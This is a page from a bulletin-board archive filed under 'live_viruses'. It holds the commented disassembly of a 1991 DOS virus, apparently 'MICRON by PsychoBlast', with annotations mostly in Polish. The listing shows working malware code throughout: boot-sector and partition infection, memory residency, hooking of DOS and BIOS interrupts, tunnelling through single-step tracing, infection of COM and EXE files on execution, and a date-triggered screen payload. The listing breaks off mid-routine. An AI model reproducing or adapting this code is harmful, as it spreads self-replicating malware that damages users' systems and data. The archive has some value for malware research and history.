The Unsorted BBS Collection

home *** CD-ROM | disk | FTP | other *** search

/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / command.asm < prev next >

Wrap

Assembly Source File | 1991-01-26 | 31KB | 1,005 lines

S0000 SEGMENT ASSUME DS:S0000, SS:S0000 ,CS:S0000 ,ES:S0000 ORG 100h JMP L9BD6 ;0100 E9 D3 9A ;------- ; zainfekowany program org 93B5h ;------- ;<------ czesc zakodowana ----------------------- L93B5: CLI ;93B5 FA XOR AX,AX ;93B6 33 C0 MOV SS,AX ;93B8 8E D0 MOV SP,7C00h ;93BA BC 00 7C STI ;93BD FB MOV AX,3 ;93BE B8 03 00 CALL L93E3 ;93C1 E8 1F 00 PUSH ES ;93C4 06 MOV AX,42H ;L93F7 ;93C5 B8 42 00 PUSH AX ;93C8 50 MOV AX,07C0h ;93C9 B8 C0 07 MOV DS,AX ;93CC 8E D8 MOV AX,0205h ;read 5 sectors into memory ;93CE B8 05 02 MOV CX,DS:2AH ;L93DF trk/sec ;93D1 8B 0E 2A 00 INC CX ;93D5 41 MOV DX,DS:2CH ;L93E1 head/drive ;93D6 8B 16 2C 00 INT 13H ;93DA CD 13 RET_FAR ;-> L93F7 ;93DC CB L93DD: ADD SI,DI ;93DD 01 FE V002A dw 0DB8Ch ;731 trk / 12 sec ;93DF 8C DB V002C dw 00680h ; 6 head / 80h drv ;93E1 80 06 ;------------------------------------------------ ; podprogram ;------------------------------------------------ L93E3: ??? ;93E3 33 DB 33 DEC WORD PTR [BP+L26C3] ;93E6 FF 8E C3 26 SUB L0413,AX ;93EA 29 06 13 04 INT 12H ;get memory size (in 1K blocks) ;93EE CD 12 MOV CL,6 ;93F0 B1 06 SHL AX,CL ;KB -> paragrph ;93F2 D3 E0 MOV ES,AX ;93F4 8E C0 RET_NEAR ;93F6 C3 ;------------------------------------------------ ; ciag dalszy L93F7: PUSH CS ;93F7 0E POP DS ;93F8 1F XOR AX,AX ;93F9 33 C0 MOV ES,AX ;93FB 8E C0 MOV BX,OFFSET L7C00 ;93FD BB 00 7C PUSH AX ;9400 50 PUSH BX ;9401 53 MOV AX,0201h ;read 1 sector into memory ;9402 B8 01 02 MOV CX,DS:2AH ;9405 8B 0E 2A 00 MOV DX,DS:2CH ;9409 8B 16 2C 00 INT 13H ;940D CD 13 MOV AX,L0867 ;940F A1 67 08 DEC AX ;9412 48 CMP AX,0CH ;9413 3D 0C 00 JBE L943D ;9416 76 25 MOV AX,1200h ;return EGA information ;9418 B8 00 12 MOV BX,0FF10h ;941B BB 10 FF INT 10H ;941E CD 10 OR BH,BH ;9420 0A FF JNZ L943D ;-> monochrome ;9422 75 19 MOV AH,4 ;read Real Time Clock date ;9424 B4 04 INT 1AH ;9426 CD 1A CMP DL,2 ;9428 80 FA 02 JNZ L943D ;942B 75 10 MOV AX,4 ;942D B8 04 00 CALL L93E3 ;9430 E8 B0 FF CALL L95AA ;9433 E8 74 01 MOV BYTE PTR DS:0E9H,0 ;9436 C6 06 E9 00 00 JMP SHORT L9442 ;943B EB 05 L943D: MOV BYTE PTR DS:0E9H,1 ;943D C6 06 E9 00 01 CLI ;9442 FA XOR AX,AX ;9443 33 C0 MOV ES,AX ;9445 8E C0 LES BX,DWORD PTR ES:70H ;int 1Ch ;9447 26 C4 1E 70 00 MOV DS:0D7H,BX ;944C 89 1E D7 00 MOV DS:0D9H,ES ;9450 8C 06 D9 00 MOV ES,AX ;9454 8E C0 LES BL,DWORD PTR ES:84H ;int 21h ;9456 26 C4 1E 84 00 MOV L0863,BX ;945B 89 1E 63 08 MOV L0865,ES ;945F 8C 06 65 08 MOV ES,AX ;9463 8E C0 MOV WORD PTR ES:70H,OFFSET L0398 ;9465 26 C7 06 70 00 98 03 MOV ES:72H,DS ;'r' ;946C 26 8C 1E 72 00 STI ;9471 FB RET_FAR ;9472 CB V00BE db 0 ;0=COM ;9473 00 V00BF db 0E9h,01Dh ;saved original pgm bytes ;9474 E9 1D db 1Ah ;9476 1A V00C2 dw 0100h ;dword victim entry point ;9477 00 01 V00C4 dw 0000h ;rel ;9479 00 00 V00C6 dw 0000h ;rel ;victim stack segment ;947B 00 00 ??? ;947D 87 0C 52 WAIT ;9480 9B ADD [BX+SI],AH ;9481 00 20 ADD [BX+SI],DH ;9483 00 30 ADC AL,[BX+SI] ;9485 12 00 DB 60H ?? ;9487 60 ADD [BX+SI],AL ;9488 00 00 ADD [BX+SI],AL ;948A 00 00 PUSH BX ;948C 53 INC WORD PTR [BX+SI] ;948D FF 00 LOCK PUSH SS ;948F F0 16 POP SS ;9491 17 DB 0C1H ?? ;9492 C1 ADD BH,[BX+39H] ;9493 02 7F 39 PUSH DX ;9496 52 WAIT ;9497 9B ADC [BX+SI],AL ;9498 10 00 ADD [BP+SI],AL ;949A 00 02 INC SP ;949C 44 INT 3 ;949D CC V00E9 db 1 ;949E 01 ??? ;949F 00 ADD DS:0,CL ;94A0 00 0E 00 00 ADD [BX+SI],AX ;94A4 01 00 ADD [SI],BL ;94A6 00 1C ADD [BX+SI],AL ;94A8 00 00 ADD [BX+DI],BL ;94AA 00 19 ADD AL,[BP+DI] ;94AC 02 03 DEC WORD PTR [BX+4DH] ;94AE FF 4F 4D DB 'ICRON by PsychoBlast' ;94B1 49 43 52 4F 4E 20 62 79 20 50 73 79 63 68 6F 42 ;================================================================ ;<------punkt startowy po rozkodowaniu wirusa na programie ------ L94C5: CALL L94C8 ;pobranie bazy wirusa ;94C5 E8 00 00 L94C8: POP SI ;94C8 5E SUB SI,113h ;SI = offset poczatku wirusa ;94C9 81 EE 13 01 PUSH SI ;94CD 56 PUSH AX ;94CE 50 PUSH ES ;94CF 06 PUSH CS ;94D0 0E POP DS ;94D1 1F MOV AX,ES ;94D2 8C C0 ADD [SI+DS:0C4H],AX ;L9479 victim CS relocation ;94D4 01 84 C4 00 ADD [SI+DS:0C6H],AX ;L947B victim SS relocation ;94D8 01 84 C6 00 CMP BYTE PTR [SI+DS:0BEH],0 ;L9473 COM ? ;94DC 80 BC BE 00 00 JNZ L94F1 ;-> EXE ;94E1 75 0E MOV AX,[SI+DS:0BFH] ;L9474 saved pgm bytes ;94E3 8B 84 BF 00 MOV ds:[100h],AX ;94E7 A3 00 01 MOV AL,[SI+DS:0C1H] ;L9476 ;94EA 8A 84 C1 00 MOV ds:[102h],AL ;94EE A2 02 01 L94F1: MOV AX,0FE01h ;computer infected ? ;94F1 B8 01 FE INT 21H ;94F4 CD 21 CMP AX,01FEh ;= 510 ;94F6 3D FE 01 JZ L9542 ;-> computer infected ;94F9 74 47 CMP BYTE PTR [SI+DS:0BEH],0 ;L9473 *.COM ? ;94FB 80 BC BE 00 00 JNZ L9507 ;-> nie ;9500 75 05 CMP SP,0FFF0h ;enought memory ? ;9502 83 FC F0 JB L9542 ;-> not ;9505 72 3B L9507: MOV AX,ES ;9507 8C C0 DEC AX ;9509 48 MOV ES,AX ;arena header segment ;950A 8E C0 CMP BYTE PTR ES:0,'Z' ;last memory block ? ;950C 26 80 3E 00 00 5A JNZ L9542 ;-> no ;9512 75 2E MOV AX,ES:3 ;block ;9514 26 A1 03 00 SUB AX,0A7H ;= 2672 byte ;9518 2D A7 00 JB L9542 ;-> not enought memory ;951B 72 25 MOV ES:3,AX ;951D 26 A3 03 00 SUB WORD PTR ES:12H,0A7H ; ;9521 26 81 2E 12 00 A7 00 MOV ES,ES:12H ;9528 26 8E 06 12 00 XOR DI,DI ;952D 33 FF MOV CX,0869h ;virus length = 2153 ;952F B9 69 08 CLD ;9532 FC REPZ MOVSB ;9533 F3 A4 PUSH ES ;virus area segment ;9535 06 POP DS ;9536 1F MOV BYTE PTR DS:0E9H,1 ;L949E ;9537 C6 06 E9 00 01 CALL L95FB ;953C E8 BC 00 CALL L96C6 ;953F E8 84 01 ;<------ end of virus job L9542: POP ES ;9542 07 POP AX ;9543 58 PUSH ES ;9544 06 POP DS ;9545 1F POP SI ;9546 5E MOV SS,CS:[SI+DS:0C6H] ;L947B victim SS ;9547 2E 8E 94 C6 00 JMP DWORD PTR CS:[SI+DS:0C2H] ;L9477 victim entry ;954C 2E FF AC C2 00 L9551: PUSH AX ;9551 50 PUSH CX ;9552 51 PUSH DX ;9553 52 MOV AH,2 ;read Real Time Clock time ;9554 B4 02 INT 1AH ;9556 CD 1A CMP CH,10H ;9558 80 FD 10 JNZ L95A6 ;955B 75 49 PUSH BX ;955D 53 PUSH ES ;955E 06 PUSH DS ;955F 1E PUSH CS ;9560 0E POP DS ;9561 1F MOV BYTE PTR DS:0E9H,1 ;9562 C6 06 E9 00 01 MOV AX,3510h ;get int 10h vector ;9567 B8 10 35 INT 21H ;956A CD 21 MOV DS:0D3H,BX ;956C 89 1E D3 00 MOV DS:0D5H,ES ;9570 8C 06 D5 00 MOV AX,2510h ;set int 10 vector ;9574 B8 10 25 MOV DX,03E7h ;= offset L979C ;9577 BA E7 03 INT 21H ;957A CD 21 MOV AH,3 ;read cursor position ;957C B4 03 XOR BH,BH ;page ;957E 32 FF INT 10H ;9580 CD 10 XOR AX,AX ;9582 33 C0 MOV ES,AX ;9584 8E C0 MOV CX,CS ;9586 8C C9 SUB CX,OFFSET L0100 ;9588 81 E9 00 01 MOV ES:L04A8,AX ;958C 26 A3 A8 04 MOV ES:L04AA,CX ;9590 26 89 0E AA 04 MOV AL,ES:L0449 ;9595 26 A0 49 04 ADD AL,80H ;9599 04 80 XOR AH,AH ;set video mode ;959B 32 E4 INT 10H ;959D CD 10 MOV AH,2 ;set cursor position ;959F B4 02 INT 10H ;95A1 CD 10 POP DS ;95A3 1F POP ES ;95A4 07 POP BX ;95A5 5B POP DX ;95A6 5A POP CX ;95A7 59 POP AX ;95A8 58 RET_NEAR ;95A9 C3 L95AA: PUSH DS ;95AA 1E XOR AX,AX ;95AB 33 C0 MOV DS,AX ;95AD 8E D8 LDS SI,DWORD PTR L04A8 ;95AF C5 36 A8 04 MOV CX,OFFSET LB31C ;95B3 B9 1C B3 POP DI ;95B6 5F DB 'AMSESLIFVASRORIMESAEP' ;95B7 41 4D 53 45 53 4C 49 46 56 41 53 52 4F 52 49 4D MOV BYTE PTR [BX],1EH ;95CC C6 07 1E OR AX,[BP+DI] ;95CF 0B 03 ADC [BX+SI],AX ;95D1 11 00 ADD [BX+SI],AL ;95D3 00 00 ADD [BX+SI],AL ;95D5 00 00 ADD [BX+SI],AL ;95D7 00 00 ADD [BX+DI+DS:0EH],BH ;95D9 00 B9 0E 00 ADD DI,0DH ;95DD 83 C7 0D LODSB ;95E0 AC XOR AH,AH ;95E1 32 E4 MOV BL,8 ;95E3 B3 08 SHR AL,1 ;95E5 D0 E8 RCL AH,1 ;95E7 D0 D4 DEC BL ;95E9 FE CB JNZ L95E5 ;95EB 75 F8 MOV ES:[DI],AH ;95ED 26 88 25 DEC DI ;95F0 4F LOOP L95E0 ;95F1 E2 ED ADD DI,0FH ;95F3 83 C7 0F DEC DX ;95F6 4A JNZ L95DA ;95F7 75 E1 POP DS ;95F9 1F RET_NEAR ;95FA C3 ;------------------------------------------------ ; Podprogram fazy rezydowania ;------------------------------------------------ L95FB: MOV AX,3513h ;get int 13h vector ;95FB B8 13 35 INT 21H ;95FE CD 21 MOV L0863,BX ;L9C18 ;9600 89 1E 63 08 MOV L0865,ES ;L9C1A ;9604 8C 06 65 08 MOV WORD PTR L037D,100h ;L9732 ptr single step ;9608 C7 06 7D 03 00 01 MOV AX,OFFSET L0201 ;960E B8 01 02 MOV BX,OFFSET L0869 ;9611 BB 69 08 MOV CX,1 ;9614 B9 01 00 MOV DX,80H ;9617 BA 80 00 PUSH DS ;961A 1E POP ES ;961B 07 CALL L96EF ;961C E8 D0 00 CMP WORD PTR [BX+DS:28H],0FE01h ;961F 81 BF 28 00 01 FE JZ L9641 ;9625 74 1A ADD BX,OFFSET L01BE ;9627 81 C3 BE 01 MOV CL,4 ;962B B1 04 MOV AL,[BX+4] ;962D 8A 47 04 CMP AL,4 ;9630 3C 04 JZ L9644 ;9632 74 10 CMP AL,6 ;9634 3C 06 JZ L9644 ;9636 74 0C CMP AL,1 ;9638 3C 01 JZ L9644 ;963A 74 08 ADD BX,10H ;963C 83 C3 10 LOOP L962D ;963F E2 EC JMP L96C5 ;9641 E9 81 00 L9644: MOV DH,[BX+5] ;9644 8A 77 05 MOV DS:2CH,DX ;',' ;9647 89 16 2C 00 MOV AX,[BX+6] ;964B 8B 47 06 MOV CX,AX ;964E 8B C8 MOV SI,6 ;9650 BE 06 00 AND AX,3FH ;'?' ;9653 25 3F 00 CMP AX,SI ;9656 3B C6 JBE L96C5 ;9658 76 6B SUB CX,SI ;965A 2B CE MOV [BX+6],CX ;965C 89 4F 06 INC CX ;965F 41 MOV DS:2AH,CX ;'*' ;9660 89 0E 2A 00 SUB [BX+0CH],SI ;9664 29 77 0C SBB WORD PTR [BX+0EH],0 ;9667 83 5F 0E 00 MOV BP,BX ;966B 8B EB MOV AX,OFFSET L0301 ;966D B8 01 03 MOV BX,OFFSET L0869 ;9670 BB 69 08 PUSHF ;9673 9C CALL DWORD PTR L0863 ;9674 FF 1E 63 08 JB L96C5 ;9678 72 4B MOV AX,OFFSET L0305 ;967A B8 05 03 MOV BX,0 ;967D BB 00 00 INC CX ;9680 41 PUSHF ;9681 9C CALL DWORD PTR L0863 ;9682 FF 1E 63 08 JB L96C5 ;9686 72 3D MOV SI,0 ;9688 BE 00 00 MOV DI,OFFSET L0869 ;968B BF 69 08 MOV CX,42H ;'B' ;968E B9 42 00 CLD ;9691 FC REPZ MOVSB ;9692 F3 A4 MOV AX,OFFSET L0301 ;9694 B8 01 03 MOV BX,OFFSET L0869 ;9697 BB 69 08 MOV CX,1 ;969A B9 01 00 XOR DH,DH ;969D 32 F6 PUSHF ;969F 9C CALL DWORD PTR L0863 ;96A0 FF 1E 63 08 JB L96C5 ;96A4 72 1F MOV AX,OFFSET L0201 ;96A6 B8 01 02 MOV CX,DS:[BP+2] ;96A9 3E 8B 4E 02 MOV DH,DS:[BP+1] ;96AD 3E 8A 76 01 PUSHF ;96B1 9C CALL DWORD PTR L0863 ;96B2 FF 1E 63 08 JB L96C5 ;96B6 72 0D SUB WORD PTR [BX+13H],6 ;96B8 83 6F 13 06 NOP ;96BC 90 MOV AX,OFFSET L0301 ;96BD B8 01 03 PUSHF ;96C0 9C CALL DWORD PTR L0863 ;96C1 FF 1E 63 08 RET_NEAR ;96C5 C3 ;------------------------------------------------ ; Podprogram fazy rezydowania ;------------------------------------------------ L96C6: MOV AX,3521h ;get int 21h vector ;96C6 B8 21 35 INT 21H ;96C9 CD 21 MOV DS:0DBH,BX ;96CB 89 1E DB 00 MOV DS:0DDH,ES ;96CF 8C 06 DD 00 MOV L0863,BX ;96D3 89 1E 63 08 MOV L0865,ES ;96D7 8C 06 65 08 MOV WORD PTR L037D,OFFSET L0320 ;96DB C7 06 7D 03 20 03 MOV AH,30H ;'0' ;96E1 B4 30 CALL L96EF ;96E3 E8 09 00 MOV AX,2521h ;set int 21h vector ;96E6 B8 21 25 MOV DX,0473h ;=offset L9828 ;96E9 BA 73 04 INT 21H ;96EC CD 21 RET_NEAR ;96EE C3 ;------------------------------------------------ ; Podprogram fazy rezydowania ;------------------------------------------------ L96EF: PUSH AX ;96EF 50 PUSH BX ;96F0 53 PUSH DX ;96F1 52 PUSH ES ;96F2 06 MOV AX,3501h ;get int 1 vector (single step) ;96F3 B8 01 35 INT 21H ;96F6 CD 21 MOV SI,BX ;96F8 8B F3 MOV DI,ES ;96FA 8C C7 MOV AX,2501h ;set int 1 vector (single step) ;96FC B8 01 25 MOV DX,0377h ;= offset L972C ;96FF BA 77 03 INT 21H ;9702 CD 21 PUSHF ;9704 9C POP AX ;9705 58 OR AX,OFFSET L0100 ;9706 0D 00 01 PUSH AX ;9709 50 POPF ;970A 9D POP ES ;970B 07 POP DX ;970C 5A POP BX ;970D 5B POP AX ;970E 58 CLI ;970F FA PUSHF ;9710 9C CALL DWORD PTR L0863 ;9711 FF 1E 63 08 PUSH AX ;9715 50 PUSH DX ;9716 52 PUSH DS ;9717 1E PUSHF ;9718 9C POP AX ;9719 58 AND AX,OFFSET LFEFF ;971A 25 FF FE PUSH AX ;971D 50 POPF ;971E 9D MOV AX,2501h ;restore int 1 vector ;971F B8 01 25 MOV DX,SI ;9722 8B D6 MOV DS,DI ;9724 8E DF INT 21H ;9726 CD 21 POP DS ;9728 1F POP DX ;9729 5A POP AX ;972A 58 RET_NEAR ;972B C3 ;------------------------------------------------ ; New int 1 (singl step) handling routine ;------------------------------------------------ L972C: PUSH BP ;972C 55 MOV BP,SP ;972D 8B EC CMP WORD PTR [BP+4],100h ;972F 81 7E 04 00 01 V037D equ $-2 ;dla wpisywania wartosci JA L974B ;9734 77 15 PUSH AX ;9736 50 PUSH ES ;9737 06 LES AL,DWORD PTR [BP+2] ;9738 C4 46 02 MOV CS:L0863,AX ;973B 2E A3 63 08 MOV CS:L0865,ES ;973F 2E 8C 06 65 08 POP ES ;9744 07 POP AX ;9745 58 AND WORD PTR [BP+6],OFFSET LFEFF ;9746 81 66 06 FF FE POP BP ;974B 5D IRET ;974C CF L974D: PUSH ES ;974D 06 PUSH BX ;974E 53 PUSH AX ;974F 50 XOR AX,AX ;9750 33 C0 MOV ES,AX ;9752 8E C0 LES BL,DWORD PTR ES:84H ;9754 26 C4 1E 84 00 MOV AX,ES ;9759 8C C0 CMP AX,CS:L0865 ;975B 2E 3B 06 65 08 JNZ L9769 ;9760 75 07 CMP BX,CS:L0863 ;9762 2E 3B 1E 63 08 JZ L9798 ;9767 74 2F PUSH DS ;9769 1E PUSH CS ;976A 0E POP DS ;976B 1F MOV DS:0DBH,BX ;976C 89 1E DB 00 MOV DS:0DDH,ES ;9770 8C 06 DD 00 MOV L0863,BX ;9774 89 1E 63 08 MOV L0865,ES ;9778 8C 06 65 08 XOR AX,AX ;977C 33 C0 MOV DS,AX ;977E 8E D8 MOV WORD PTR DS:84H,OFFSET L0473 ;9780 C7 06 84 00 73 04 MOV DS:86H,CS ;9786 8C 0E 86 00 LES BL,DWORD PTR CS:0D7H ;978A 2E C4 1E D7 00 MOV DS:70H,BX ;'p' ;978F 89 1E 70 00 MOV DS:72H,ES ;'r' ;9793 8C 06 72 00 POP DS ;9797 1F POP AX ;9798 58 POP BX ;9799 5B POP ES ;979A 07 IRET ;979B CF ;------------------------------------------------ ; New int 10 handling routine ;------------------------------------------------ L979C: PUSHF ;979C 9C OR AH,AH ;979D 0A E4 JNZ L97D6 ;979F 75 35 PUSH AX ;97A1 50 PUSH DX ;97A2 52 PUSH DS ;97A3 1E PUSH CS ;97A4 0E POP DS ;97A5 1F AND AL,7FH ;97A6 24 7F CMP AL,3 ;97A8 3C 03 JA L97C0 ;97AA 77 14 CMP AL,2 ;97AC 3C 02 JB L97C0 ;97AE 72 10 MOV WORD PTR DS:0EAH,0 ;97B0 C7 06 EA 00 00 00 MOV AX,251Ch ;set int 1Ch (user timer tick) ;97B6 B8 1C 25 MOV DX,0427h ;= offset L97DC ;97B9 BA 27 04 INT 21H ;97BC CD 21 JMP SHORT L97D3 ;97BE EB 13 L97C0: MOV AX,251Ch ;set int 1Ch (user timer tick) ;97C0 B8 1C 25 MOV DX,0820h ;= offset L9BD5 ;97C3 BA 20 08 INT 21H ;97C6 CD 21 MOV DX,OFFSET L03D4 ;97C8 BA D4 03 MOV AX,0CH ;97CB B8 0C 00 OUT DX,AX ;97CE EF MOV AX,0DH ;97CF B8 0D 00 OUT DX,AX ;97D2 EF POP DS ;97D3 1F POP DX ;97D4 5A POP AX ;97D5 58 POPF ;97D6 9D JMP DWORD PTR CS:0D3H ;97D7 2E FF 2E D3 00 ;------------------------------------------------ ; set int 1Ch (user timer tick) handling routine ;------------------------------------------------ L97DC: PUSH DS ;97DC 1E PUSH ES ;97DD 06 PUSH SI ;97DE 56 PUSH DI ;97DF 57 PUSH AX ;97E0 50 PUSH CX ;97E1 51 PUSH DX ;97E2 52 MOV DX,OFFSET L03D4 ;97E3 BA D4 03 MOV AX,OFFSET L100C ;97E6 B8 0C 10 OUT DX,AX ;97E9 EF MOV AX,0DH ;97EA B8 0D 00 OUT DX,AX ;97ED EF MOV AX,OFFSET LB800 ;97EE B8 00 B8 MOV DS,AX ;97F1 8E D8 MOV AX,OFFSET LBA00 ;97F3 B8 00 BA MOV ES,AX ;97F6 8E C0 MOV SI,CS:0EAH ;97F8 2E 8B 36 EA 00 MOV DI,OFFSET L0F9E ;97FD BF 9E 0F SUB DI,SI ;9800 2B FE CLD ;9802 FC MOV CX,OFFSET L01F4 ;9803 B9 F4 01 LODSW ;9806 AD MOV ES:[DI],AX ;9807 26 89 05 SUB DI,2 ;980A 83 EF 02 LOOP L9806 ;980D E2 F7 MOV CS:0EAH,SI ;980F 2E 89 36 EA 00 CMP SI,OFFSET L0FA0 ;9814 81 FE A0 0F JB L9820 ;9818 72 06 XOR AX,AX ;981A 33 C0 MOV CS:0EAH,AX ;981C 2E A3 EA 00 POP DX ;9820 5A POP CX ;9821 59 POP AX ;9822 58 POP DI ;9823 5F POP SI ;9824 5E POP ES ;9825 07 POP DS ;9826 1F IRET ;9827 CF ;------------------------------------------------ ; New int 21 handling rotine ;------------------------------------------------ L9828: PUSHF ;9828 9C CMP AX,OFFSET L2521 ;'%!' ;9829 3D 21 25 JNZ L983A ;982C 75 0C MOV CS:0DBH,DX ;982E 2E 89 16 DB 00 MOV CS:0DDH,DS ;9833 2E 8C 1E DD 00 JMP SHORT L9898 ;9838 EB 5E CMP AX,OFFSET L3521 ;'5!' ;983A 3D 21 35 JNZ L9846 ;983D 75 07 LES BL,DWORD PTR CS:0DBH ;983F 2E C4 1E DB 00 JMP SHORT L9898 ;9844 EB 52 L9846: CMP AH,4BH ;'K' ;9846 80 FC 4B JNZ L9879 ;9849 75 2E OR AL,AL ;984B 0A C0 JNZ L9873 ;984D 75 24 PUSH AX ;984F 50 MOV CS:0C8H,SP ;9850 2E 89 26 C8 00 MOV CS:0CAH,SS ;9855 2E 8C 16 CA 00 CLI ;985A FA MOV AX,CS ;985B 8C C8 MOV SS,AX ;985D 8E D0 MOV SP,OFFSET L0A69 ;985F BC 69 0A STI ;9862 FB CALL L98C8 ;9863 E8 62 00 CLI ;9866 FA MOV SS,CS:0CAH ;9867 2E 8E 16 CA 00 MOV SP,CS:0C8H ;986C 2E 8B 26 C8 00 STI ;9871 FB POP AX ;9872 58 POPF ;9873 9D JMP DWORD PTR CS:L0863 ;9874 2E FF 2E 63 08 L9879: CMP AX,OFFSET LFE01 ;9879 3D 01 FE JNZ L9882 ;987C 75 04 NOT AX ;987E F7 D0 JMP SHORT L9898 ;9880 EB 16 L9882: CMP BYTE PTR CS:0E9H,1 ;9882 2E 80 3E E9 00 01 JZ L988D ;9888 74 03 CALL L9551 ;988A E8 C4 FC INC WORD PTR CS:0E7H ;988D 2E FF 06 E7 00 POPF ;9892 9D JMP DWORD PTR CS:0DBH ;9893 2E FF 2E DB 00 L9898: POPF ;9898 9D IRET ;9899 CF L989A: MOV AL,3 ;989A B0 03 IRET ;989C CF L989D: MOV AH,40H ;'@' ;989D B4 40 JMP SHORT L98A3 ;989F EB 02 L98A1: MOV AH,3FH ;'?' ;98A1 B4 3F CALL L98BB ;98A3 E8 15 00 JB L98AA ;98A6 72 02 SUB AX,CX ;98A8 2B C1 L98AA: RET_NEAR ;98AA C3 L98AB: XOR CX,CX ;98AB 33 C9 XOR DX,DX ;98AD 33 D2 MOV AX,OFFSET L4202 ;98AF B8 02 42 JMP SHORT L98BB ;98B2 EB 07 L98B4: XOR CX,CX ;98B4 33 C9 XOR DX,DX ;98B6 33 D2 MOV AX,OFFSET L4200 ;98B8 B8 00 42 MOV BX,CS:L0861 ;98BB 2E 8B 1E 61 08 CLI ;98C0 FA PUSHF ;98C1 9C CALL DWORD PTR CS:L0863 ;98C2 2E FF 1E 63 08 RET_NEAR ;98C7 C3 L98C8: PUSH BX ;98C8 53 PUSH CX ;98C9 51 PUSH SI ;98CA 56 PUSH DI ;98CB 57 PUSH ES ;98CC 06 PUSH DX ;98CD 52 PUSH DS ;98CE 1E PUSH CS ;98CF 0E POP DS ;98D0 1F MOV AX,OFFSET L3300 ;98D1 B8 00 33 CALL L98C0 ;98D4 E8 E9 FF MOV DS:0CCH,DL ;98D7 88 16 CC 00 MOV AX,OFFSET L3301 ;98DB B8 01 33 XOR DX,DX ;98DE 33 D2 CALL L98C0 ;98E0 E8 DD FF MOV AX,OFFSET L3524 ;'5$' ;98E3 B8 24 35 CALL L98C0 ;98E6 E8 D7 FF MOV DS:0DFH,BX ;98E9 89 1E DF 00 MOV DS:0E1H,ES ;98ED 8C 06 E1 00 MOV AX,OFFSET L2524 ;'%$' ;98F1 B8 24 25 MOV DX,OFFSET L04E5 ;98F4 BA E5 04 CALL L98C0 ;98F7 E8 C6 FF POP DS ;98FA 1F POP DX ;98FB 5A PUSH DX ;98FC 52 PUSH DS ;98FD 1E MOV AX,OFFSET L4300 ;98FE B8 00 43 CALL L98C0 ;9901 E8 BC FF MOV CS:0CDH,CX ;9904 2E 89 0E CD 00 MOV AX,OFFSET L4301 ;9909 B8 01 43 XOR CX,CX ;990C 33 C9 CALL L98C0 ;990E E8 AF FF JB L9990 ;9911 72 7D MOV AX,OFFSET L3D02 ;9913 B8 02 3D CALL L98C0 ;9916 E8 A7 FF JB L9985 ;9919 72 6A PUSH CS ;991B 0E POP DS ;991C 1F MOV L0861,AX ;991D A3 61 08 MOV AX,OFFSET L5700 ;9920 B8 00 57 CALL L98BB ;9923 E8 95 FF JB L996E ;9926 72 46 MOV DS:0CFH,DX ;9928 89 16 CF 00 MOV DS:0D1H,CX ;992C 89 0E D1 00 MOV DX,OFFSET LFFB8 ;9930 BA B8 FF MOV CX,0FFFF ;9933 B9 FF FF CALL L98AF ;9936 E8 76 FF JB L996E ;9939 72 33 MOV DX,OFFSET L0869 ;993B BA 69 08 MOV CX,2 ;993E B9 02 00 CALL L98A1 ;9941 E8 5D FF JB L996E ;9944 72 28 CMP WORD PTR L0869,OFFSET LBB0E ;9946 81 3E 69 08 0E BB JZ L996E ;994C 74 20 CALL L98B4 ;994E E8 63 FF JB L996E ;9951 72 1B MOV DX,OFFSET L0869 ;9953 BA 69 08 MOV CX,1CH ;9956 B9 1C 00 CALL L98A1 ;9959 E8 45 FF JB L996E ;995C 72 10 CMP WORD PTR L0869,OFFSET L5A4D ;'ZM' ;995E 81 3E 69 08 4D 5A JZ L996B ;9964 74 05 CALL L99AE ;9966 E8 45 00 JMP SHORT L996E ;9969 EB 03 CALL L9A0E ;996B E8 A0 00 MOV AX,OFFSET L5701 ;996E B8 01 57 MOV DX,DS:0CFH ;9971 8B 16 CF 00 MOV CX,DS:0D1H ;9975 8B 0E D1 00 CALL L98BB ;9979 E8 3F FF MOV AH,3EH ;'>' ;997C B4 3E CALL L98BB ;997E E8 3A FF POP DS ;9981 1F POP DX ;9982 5A PUSH DX ;9983 52 PUSH DS ;9984 1E MOV AX,OFFSET L4301 ;9985 B8 01 43 MOV CX,CS:0CDH ;9988 2E 8B 0E CD 00 CALL L98C0 ;998D E8 30 FF MOV AX,OFFSET L2524 ;'%$' ;9990 B8 24 25 LDS DX,DWORD PTR CS:0DFH ;9993 2E C5 16 DF 00 CALL L98C0 ;9998 E8 25 FF MOV AX,OFFSET L3301 ;999B B8 01 33 MOV DL,CS:0CCH ;999E 2E 8A 16 CC 00 CALL L98C0 ;99A3 E8 1A FF POP DS ;99A6 1F POP DX ;99A7 5A POP ES ;99A8 07 POP DI ;99A9 5F POP SI ;99AA 5E POP CX ;99AB 59 POP BX ;99AC 5B RET_NEAR ;99AD C3 CALL L98AB ;99AE E8 FA FE JB L9A0D ;99B1 72 5A OR DX,DX ;99B3 0B D2 JNZ L9A0D ;99B5 75 56 CMP AX,OFFSET LF646 ;99B7 3D 46 F6 JNB L9A0D ;99BA 73 51 MOV SI,AX ;99BC 8B F0 MOV BYTE PTR DS:0BEH,0 ;99BE C6 06 BE 00 00 MOV WORD PTR DS:0C2H,OFFSET L0100 ;99C3 C7 06 C2 00 00 01 MOV WORD PTR DS:0C4H,0 ;99C9 C7 06 C4 00 00 00 MOV WORD PTR DS:0C6H,0 ;99CF C7 06 C6 00 00 00 MOV AX,L0869 ;99D5 A1 69 08 MOV DS:0BFH,AX ;99D8 A3 BF 00 MOV AL,L086B ;99DB A0 6B 08 MOV DS:0C1H,AL ;99DE A2 C1 00 INC WORD PTR L0867 ;99E1 FF 06 67 08 PUSH SI ;99E5 56 MOV BX,SI ;99E6 8B DE ADD BX,OFFSET L0100 ;99E8 81 C3 00 01 CALL L9AD2 ;99EC E8 E3 00 POP SI ;99EF 5E JB L9A0D ;99F0 72 1B CALL L98B4 ;99F2 E8 BF FE JB L9A0D ;99F5 72 16 MOV BYTE PTR L0869,0E9H ;99F7 C6 06 69 08 E9 ADD SI,OFFSET L081E ;99FC 81 C6 1E 08 MOV L086A,SI ;9A00 89 36 6A 08 MOV DX,OFFSET L0869 ;9A04 BA 69 08 MOV CX,3 ;9A07 B9 03 00 CALL L989D ;9A0A E8 90 FE RET_NEAR ;9A0D C3 CALL L98AB ;9A0E E8 9A FE JB L9A0D ;9A11 72 FA MOV SI,AX ;9A13 8B F0 MOV DI,DX ;9A15 8B FA MOV BX,AX ;9A17 8B D8 MOV CX,DX ;9A19 8B CA MOV AX,L086D ;9A1B A1 6D 08 MUL WORD PTR DS:0E5H ;9A1E F7 26 E5 00 SUB AX,BX ;9A22 2B C3 SBB DX,CX ;9A24 1B D1 JB L9A0D ;9A26 72 E5 MOV AX,L0877 ;9A28 A1 77 08 MUL WORD PTR DS:0E3H 